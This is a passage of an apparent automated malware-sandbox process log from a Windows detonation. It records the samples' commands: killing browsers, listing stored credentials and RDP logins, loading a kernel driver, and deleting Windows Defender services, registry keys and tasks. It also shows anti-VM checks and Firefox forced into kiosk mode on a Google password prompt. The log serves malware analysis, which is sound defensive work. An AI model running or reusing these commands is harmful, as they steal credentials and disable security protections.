                                                                      "taskkill" /IM uc_browser.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:2400
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM slimjet.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:2912
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM cent_browser.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:4976
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM epic.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:6548
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM torch.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:6288
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM whale.exe
                                                                      7⤵
                                                                        PID:4880
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /IM 360browser.exe
                                                                        7⤵
                                                                        • Kills process with taskkill
                                                                        PID:6700
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /IM qqbrowser.exe
                                                                        7⤵
                                                                          PID:5860
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /IM browser.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:4748
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM chrome.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:6796
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM msedge.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:2464
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM brave.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:11820
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM opera.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:7344
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM vivaldi.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:6572
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM firefox.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:6812
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM dragon.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:4184
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM maxthon.exe
                                                                          7⤵
                                                                            PID:5388
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM uc_browser.exe
                                                                            7⤵
                                                                              PID:4524
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM slimjet.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:6768
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM cent_browser.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:2116
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM epic.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:6988
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM torch.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:7172
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM whale.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:7504
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM 360browser.exe
                                                                              7⤵
                                                                              • Kills process with taskkill
                                                                              PID:8260
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM qqbrowser.exe
                                                                              7⤵
                                                                                PID:8376
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM browser.exe
                                                                                7⤵
                                                                                  PID:8496
                                                                                • C:\Windows\system32\vaultcmd.exe
                                                                                  "vaultcmd" /list
                                                                                  7⤵
                                                                                    PID:8932
                                                                                  • C:\Windows\system32\cmdkey.exe
                                                                                    "cmdkey" /list
                                                                                    7⤵
                                                                                      PID:9016
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                                                                      7⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:9124
                                                                                      • C:\Windows\system32\cmdkey.exe
                                                                                        "C:\Windows\system32\cmdkey.exe" /list
                                                                                        8⤵
                                                                                          PID:9468
                                                                                      • C:\Windows\system32\certutil.exe
                                                                                        "certutil" -store My
                                                                                        7⤵
                                                                                          PID:9516
                                                                                        • C:\Windows\system32\certutil.exe
                                                                                          "certutil" -store -user My
                                                                                          7⤵
                                                                                            PID:9616
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                            7⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:7660
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                                                            7⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Hide Artifacts: Ignore Process Interrupts
                                                                                            PID:10300
                                                                                          • C:\Windows\system32\cmdkey.exe
                                                                                            "cmdkey" /list
                                                                                            7⤵
                                                                                              PID:10672
                                                                                            • C:\Windows\system32\cmdkey.exe
                                                                                              "cmdkey" /list:TERMSRV/69.48.201.74
                                                                                              7⤵
                                                                                                PID:10772
                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                7⤵
                                                                                                  PID:11036
                                                                                                • C:\Windows\system32\hostname.exe
                                                                                                  "hostname"
                                                                                                  7⤵
                                                                                                    PID:11164
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:11260
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:11584
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                    7⤵
                                                                                                      PID:10920
                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                      "netsh" advfirewall show allprofiles state
                                                                                                      7⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      PID:7852
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                    6⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4288
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                      7⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3992
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\36BB.tmp\36CB.tmp\36CC.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                        8⤵
                                                                                                          PID:1792
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                            9⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5060
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37D4.tmp\37D5.tmp\37D6.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                              10⤵
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:3252
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:3616
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc start ddrver
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:5344
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                11⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:4556
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop ddrver
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:5436
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc start ddrver
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:5116
                                                                                                              • C:\Windows\system32\takeown.exe
                                                                                                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                11⤵
                                                                                                                • Possible privilege escalation attempt
                                                                                                                • Modifies file permissions
                                                                                                                PID:6076
                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                11⤵
                                                                                                                • Possible privilege escalation attempt
                                                                                                                • Modifies file permissions
                                                                                                                PID:764
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "WinDefend"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:5240
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc delete "WinDefend"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1900
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                11⤵
                                                                                                                  PID:2608
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop "MDCoreSvc"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:4560
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc delete "MDCoreSvc"
                                                                                                                  11⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:3540
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                  11⤵
                                                                                                                    PID:3116
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "WdNisSvc"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4384
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "WdNisSvc"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:5480
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                    11⤵
                                                                                                                      PID:4700
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "Sense"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4592
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "Sense"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3360
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                      11⤵
                                                                                                                        PID:4548
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "wscsvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4656
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "wscsvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4920
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                        11⤵
                                                                                                                        • Modifies security service
                                                                                                                        PID:2360
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "SgrmBroker"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2400
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "SgrmBroker"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2220
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                        11⤵
                                                                                                                          PID:5400
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc stop "SecurityHealthService"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5968
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc delete "SecurityHealthService"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:872
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                          11⤵
                                                                                                                            PID:4476
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc stop "webthreatdefsvc"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2080
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc delete "webthreatdefsvc"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:5708
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                            11⤵
                                                                                                                              PID:3812
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop "webthreatdefusersvc"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:1060
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc delete "webthreatdefusersvc"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3728
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                              11⤵
                                                                                                                                PID:1792
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop "WdNisDrv"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:6032
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc delete "WdNisDrv"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:1960
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                11⤵
                                                                                                                                  PID:408
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop "WdBoot"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:5664
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete "WdBoot"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:5388
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:2116
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop "WdFilter"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:5760
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc delete "WdFilter"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:1876
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                    11⤵
                                                                                                                                      PID:2756
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc stop "SgrmAgent"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2096
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete "SgrmAgent"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:4876
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:5920
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop "MsSecWfp"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:5156
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc delete "MsSecWfp"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:60
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:1196
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc stop "MsSecFlt"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:5820
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc delete "MsSecFlt"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:4184
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:5624
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop "MsSecCore"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:2308
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc delete "MsSecCore"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:4712
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:5376
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:3064
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:5700
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                  11⤵
                                                                                                                                                    PID:2668
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5668
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop ddrver
                                                                                                                                                      11⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4460
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc delete ddrver
                                                                                                                                                      11⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:5716
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413340101\ad3a24ec7b.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413340101\ad3a24ec7b.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:4380
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413350101\5ae5b64f3b.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413350101\5ae5b64f3b.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1212
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413350101\5ae5b64f3b.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413360101\f209da0ab6.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413360101\f209da0ab6.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1156
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10413360101\f209da0ab6.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Downloads MZ/PE file
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5156
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413370101\2e0d10354c.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413370101\2e0d10354c.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:1324
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413380101\abecbf00f4.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413380101\abecbf00f4.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:3828
                                                                                                                                            • C:\Users\Admin\AppData\Local\PS5Qnq3KhdGA.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\PS5Qnq3KhdGA.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2972
                                                                                                                                            • C:\Users\Admin\AppData\Local\hoSTAPBDV96u.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\hoSTAPBDV96u.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:3876
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413390101\9e9c1f1507.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413390101\9e9c1f1507.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:5344
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F /IM firefox.exe /T
                                                                                                                                              7⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:3836
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F /IM chrome.exe /T
                                                                                                                                              7⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:916
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F /IM msedge.exe /T
                                                                                                                                              7⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5124
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F /IM opera.exe /T
                                                                                                                                              7⤵
                                                                                                                                                PID:4848
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /F /IM brave.exe /T
                                                                                                                                                7⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:4436
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                7⤵
                                                                                                                                                  PID:4696
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                    8⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:3944
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1988 -prefsLen 27099 -prefMapHandle 1992 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {5183a97d-ee2b-4c9f-b64f-96a2e71f0c55} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                      9⤵
                                                                                                                                                        PID:1304
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2488 -initialChannelId {8587cc44-743a-441e-bad1-4c811ed0c550} -parentPid 3944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                        9⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        PID:1324
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
